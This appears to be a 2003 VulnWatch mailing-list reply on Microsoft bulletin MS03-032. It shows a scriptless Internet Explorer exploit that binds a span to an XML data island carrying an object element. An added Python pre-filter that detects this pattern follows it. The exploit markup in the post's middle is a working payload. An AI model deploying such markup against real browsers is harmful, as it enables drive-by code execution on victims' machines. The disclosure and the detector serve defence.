[VulnWatch] RE: BAD NEWS: Microsoft Security Bulletin MS03-032

From: GreyMagic Software (securityat_private)
Date: Mon Sep 08 2003 - 07:52:12 PDT

    >The patch for Drew's object data=funky.hta doesn't work:
    
    This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
    explains the problem in detail. Microsoft again patches the object element
    in HTML, but it doesn't patch the dynamic version of that same element.
    
    >1. Disable Active Scripting
    
    This actually means that no scripting is needed at all in order to exploit
    this amazingly critical vulnerability:
    
    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
        <security>
            <exploit>
                <![CDATA[
                <object data=x.asp></object>
                ]]>
            </exploit>
        </security>
    </xml>
    
    Ouch.
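
An added example, not part of the original post: a static pre-filter that flags the pattern shown above, where an element with dataformatas="html" is bound to an XML data island whose content carries an object element, so no script is present to key on. The function names and the samples other than the post's own markup are constructed for illustration.

```python
import html
import re

# Regex-based on purpose: a static pre-filter, not a full HTML parser.
# Limitation: attribute values containing ">" are not handled.
TAG = re.compile(r"<(\w+)\b([^>]*)>")
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
ISLAND = re.compile(r"<xml\b([^>]*)>(.*?)</xml\s*>", re.I | re.S)
OBJECT = re.compile(r"<\s*object\b", re.I)

def attrs(raw):
    """Parse a tag's attribute string into a dict with lower-cased names."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR.finditer(raw)}

def find_bound_objects(page):
    """Return (tag, island_id) for elements that render an island holding <object> as HTML."""
    islands = {}
    for m in ISLAND.finditer(page):
        island_id = attrs(m.group(1)).get("id")
        if island_id:
            # CDATA and entity escaping are equivalent in XML, so decode entities.
            islands[island_id.lower()] = html.unescape(m.group(2))
    hits = []
    for m in TAG.finditer(page):
        a = attrs(m.group(2))
        if a.get("dataformatas", "").lower() != "html":
            continue
        src = a.get("datasrc", "").lstrip("#").lower()
        if src in islands and OBJECT.search(islands[src]):
            hits.append((m.group(1).lower(), src))
    return hits

# Constructed samples: the markup from the post, an entity-escaped variant, a benign binding.
FROM_POST = '''<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object data=x.asp></object>
]]></exploit></security></xml>'''
ESCAPED = '''<div datasrc=#d1 datafld=f dataformatas=html></div>
<xml id=d1><r><f>&lt;object data=x.asp&gt;&lt;/object&gt;</f></r></xml>'''
BENIGN = '''<span datasrc="#news" datafld="item" dataformatas="html"></span>
<xml id="news"><r><item><![CDATA[<b>hello</b>]]></item></r></xml>'''

if __name__ == "__main__":
    for name, page in (("post", FROM_POST), ("escaped", ESCAPED), ("benign", BENIGN)):
        print(name, find_bound_objects(page))
```

The check scans the whole island rather than only the field named in datafld, so it errs toward flagging.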
    